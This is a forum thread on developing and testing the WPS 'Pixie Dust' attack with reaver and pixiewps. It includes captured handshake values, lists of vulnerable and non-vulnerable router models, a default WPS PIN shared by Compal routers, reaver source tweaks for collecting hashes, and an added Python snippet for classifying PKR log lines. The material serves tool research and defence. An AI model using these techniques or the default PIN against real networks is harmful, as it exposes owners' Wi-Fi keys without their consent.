I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.
I couldn't find the video yet, even under your name/channel. Probably not finished uploading.
Is the new pixiewps ready, with more Realtek support?
Not all the Realtek support. It's still under development but the process will be the same. If it doesn't turn up a pin the first time you try it against Realtek, run it again. I had the problem in the video but didn't want to cut it cuz then people would think it's fake.
Btw, I use pixiewps right from Wiire's github, not from the Kali repos.
Last edited by soxrok2212; 2015-04-20 at 22:04.
Nice video !!!
Great work, all involved.
Pixie Dust Data Types and successful WPS pin extraction.
There are two (2) types of Pixie Dust data sequences:
When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.
When --dh-small is not used the -PKR variable constantly changes.
Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key, while the same reaver command line without --dh-small (so -PKR was variable) provided data that DID extract the WPS Key.
MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.
MTeams Labs
I just want to point out that the tool is not completed yet, it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure whether --dh-small causes bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should mean that it works with --dh-small too (unless there's a bug in my code lol).
To wiire
Further PKR corrections when using --dh-small in the reaver command line
Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However, in all the output provided by the modded reaver, the PKR variable when dh-small is used shows the 02 at the beginning of the string and the key is never found.
MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.
In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.
Musket Teams Labs
PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, oops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).
That's because with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).
Anyway now the recommended version of Reaver is the one made and maintained by t6_x and datahead (which prints it right). I updated the link to my original post.
Last edited by wiire; 2015-04-21 at 14:16.
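Added illustration (not code from this thread, Reaver or pixiewps): a Python check that classifies `[P] PKR:` lines in a captured log as the fixed small-key value 2, the same value printed byte-reversed, or a variable key, tying together the 575-character string Musket Teams describe and the g^A mod P = 2 explanation above. The function names are hypothetical, and the 127-bit modulus and sample log lines are constructed stand-ins (any P > 2 gives the same result).

```python
import re

PK_LEN = 192                   # bytes in a WPS Diffie-Hellman public key
PRINTED_LEN = PK_LEN * 3 - 1   # 384 hex digits + 191 colons = 575 characters
PKR_LINE = re.compile(r"\[P\]\s+PKR:\s*([0-9A-Fa-f:]+)")


def small_key_public(p, g=2, a=1):
    """g^A mod P with generator 2 and private number A = 1 (the small-key case)."""
    return pow(g, a, p)


def format_pk(value):
    """Render a public key as 192 big-endian bytes, colon separated."""
    return ":".join(f"{b:02x}" for b in value.to_bytes(PK_LEN, "big"))


def parse_pk(text):
    """Turn a colon-separated hex string into bytes, rejecting wrong lengths."""
    parts = text.strip().split(":")
    if len(parts) != PK_LEN or any(
        re.fullmatch(r"[0-9A-Fa-f]{2}", x) is None for x in parts
    ):
        raise ValueError("expected 192 colon-separated hex bytes")
    return bytes(int(x, 16) for x in parts)


def classify_pkr(text):
    """Classify one printed PKR value by the integer it encodes."""
    raw = parse_pk(text)
    if int.from_bytes(raw, "big") == 2:
        return "small-key"                  # 00: ... :02, as seen on the wire
    if int.from_bytes(raw, "little") == 2:
        return "small-key-byte-reversed"    # 02:00: ... , the printing bug
    return "variable"


def scan_log(lines):
    """Return (line number, classification) for every PKR line in a log."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = PKR_LINE.search(line)
        if not match:
            continue
        try:
            findings.append((number, classify_pkr(match.group(1))))
        except ValueError:
            findings.append((number, "malformed"))
    return findings


# Constructed inputs: a stand-in prime modulus and four sample PKR lines.
STAND_IN_P = 2**127 - 1
SAMPLE_LOG = [
    "[+] Received M1 message",
    "[P] PKR: " + format_pk(small_key_public(STAND_IN_P)),
    "[P] PKR: " + "02" + ":00" * (PK_LEN - 1),
    "[P] PKR: " + format_pk(int.from_bytes(bytes(range(1, PK_LEN + 1)), "big")),
    "[P] PKR: 00:02",
]

if __name__ == "__main__":
    for number, verdict in scan_log(SAMPLE_LOG):
        print(number, verdict)
```

A registrar public key that never changes between sessions and equals 2 is also a usable monitoring signal, since a registrar using a random private number would not produce it.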
uhm, anyone had any luck with atheros chipsets yet?
some updates for the database ;-)
Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, it's some kind of VULNERABLE.
NOT VULNERABLE:
TP-LINK TL-WR740n v1/v2
Broadcom BCM5356
NOT VULNERABLE:
Belkin F7D1301 v1
Broadcom BCM5356A1
NOT VULNERABLE:
ASUS RT-AC66U
Broadcom BCM4706
Sweet thanks! Just updated everything.. should be all set
Not vulnerable:
ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW
Last edited by SubZero5; 2015-04-22 at 08:47.
@ soxrok
please update the Chipset from Hitron CVE30360. The correct one is RT 3352F
And a new one for the Database:
NOT VULNERABLE:
TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz
hi soxrok2212 what about technicolor TD5130? is there any method to crack it
your new version works on TD5130 v2 ..but on TD5130 v1 no. I will wait for a new video for all Realtek chipsets
I was not successful with this AP. Do you need me to gather any more information?
Doesn't work on the UK TalkTalk super router
Broadcom chipset, Huawei model
I confirm it's working on Technicolor TD5130 v2... :
..But not on TD5130 v1 :
So we're waiting for a new update of Pixie, and I hope it'll be very soon...
pixiewps isn't installing.
it shows problem in line 46:26
after that it also halts on 'SHA1' line.
any way to solve it...???
I'm running Kali live
Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please
Hi,
checked three of them, each one has as Default-PIN 47385580 in WPS Settings.
For 7 Models with Reaver --> PSK + SSID "(null)", only one shows SSID and PSK. Bully delivers both Values correctly.
Btw: In your Pixie-Database a second Compal-Device is listed (CBN-106-145-065). The CBN-xxx-xxx-xxx number is different on each router I've tested. So it's probably the same model.
Here are 5 of them:
Last edited by someone_else; 2015-04-25 at 12:32.
Alright thanks... there was no other pin listed?
Now, I have some information about the F8:1A:67:XX:XX:XX MAC address (RTL 8671 ev 2006 07 27 chipset of TP-LINK modems)
These MAC addresses are masks ... F8:1A:67 is the mask, FA:1A:67 the original MAC..
Last edited by Saydamination; 2015-04-25 at 15:41. Reason: other reasons
nope. Don't know if this is ISP/Country specific, but (again) all tested Routers have the same PIN.
Here is the User-Manual, the WPS Menu is described on page 50.
if it's any use for anyone
TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341
Zyxel Keenetic vulnerable
unknown chipset
Sorry for the off-topic, I've got further information about Compal:
MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In my 8 cases, "N" is 53059. (Convert this number (with leading zero) to hex and you get 353B, part of the MAC address.)
The other 9 numbers "x" are the last 6 letters from the MAC address in decimal.
And cbn should be something like "Compal Broadband Network".
Later last day I got two Compal models with MAC address (DC:53:7C), each of them has a different PIN:
AND HERE:Code:[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c [P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57 [P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70 [P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
/\/\Code:[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf [P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b [P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64 [P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
NOT VULNERABLE:
Linksys WRT120n
Atheros AR9285
NOT VULNERABLE:Code:[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f [P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84 [P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15 [P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2 [P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe [P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
D-Link 615 B2
Atheros AR5416/Atheros AR2122
Code:[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb [P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f [P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82 [P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4 [P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3 [P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f
1. Which is the best tool for automated hash collection? Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.
2. Are hashes from locked routers corrupt - no good for analysis?
3. Also any update on Realtek attack?
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In case the chipset and/or the model/manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually.
2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).
3.
Do you know how to "disassemble" firmware? I am stuck and need some help; I found something very interesting on unsupported Realtek, in parts that can be disassembled easily with binwalk from Craig Heffner.
Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that is not the case), and one of them is the default WPS PIN.
On these devices the PIN is permanent/unconfigurable.
Help would be appreciated
"The best way is simply to save a *.cap file with the PROBES and M messages"
Gonna take a look at Wireshark, try and figure it out.
kcdtv, appreciate the responses -very interesting.
Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.
I use a modified reaver-src. If I set the -o $logfile switch, reaver writes only the pixie-data in the logfile:
For AuthKey make the following changes:
change:
Code:
wps_common.c: printf("[P] AuthKey: ");
to:
Code:
wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h") with:
Code:
#include "../misc.h"
And for messages you don't need (here the M1 received msg):
replace:
Code:
exchange.c: printf("[+] Received M1 message\n");
with:
Code:
exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
I'll search with grep for all reaver messages, and change everything which is not important for the output file.
Not the perfect way, but it works.
Last edited by someone_else; 2015-04-26 at 15:21.
I do have a fork of autopixiewps I modified a while back that does hash collection, and then also produces a shell script. I'll update my fork in my GitHub repo (GitHub user name: d8tahead).
It saves generic reaver output of model info, collects hashes, produces a shell script for the corresponding hashes with pixiewps, and gives each segment an ID#.
Edit:
The one in my repo is a little old, I'll update it soon.
Will post ASAP.
Edit #2:
I had to strip out some things from the code, but it should still work fine.
autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps
and you will need the new reaver t6x fork (I added the addition of R-Nonce for future pixiewps):
https://github.com/t6x/reaver-wps-fork-t6x
For my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan (pixiehash gathering mode).
Also please note that the logs will be saved as ESSID and BSSID with the prefix PixieHash in the executing directory!
So be sure to cd to whichever directory you would like the hashes to be saved in if executing from a shell.
Remember to make autopixiewps.py executable!
Last edited by datahead; 2015-04-27 at 05:41.
After your last update reaver doesn't work: pixiewps: invalid option -- 'm'
ISSUE: ??
I looked at all the pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!
Example:
WPS manufacturer: TPLINK
WPS model number: 1
TP-Link uses Realtek and Atheros chipsets...
True value:
WPS manufacturer: Atheros
WPS model number: WR740..
Other example:
WPS manufacturer: Realtek Semiconductor,
WPS model number: EV-2006-07-27...
Not "EV-2006-07-27" model number, true value: RTL8671
Can someone please tell me how to make reaver delay between sending M1 and M2?
Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
[/code]
Couldn't get libssl-dev, it's forbidden in the repository as Kali is unable to update.
I'm running the latest live version but still can get the package.
pixie is unable to install without SSL.
Help me......
What fixes and improvements will pixiewps 1.1 bring?
How did you get this PIN?
I will try it later this week because I'm travelling right now.
Thank you.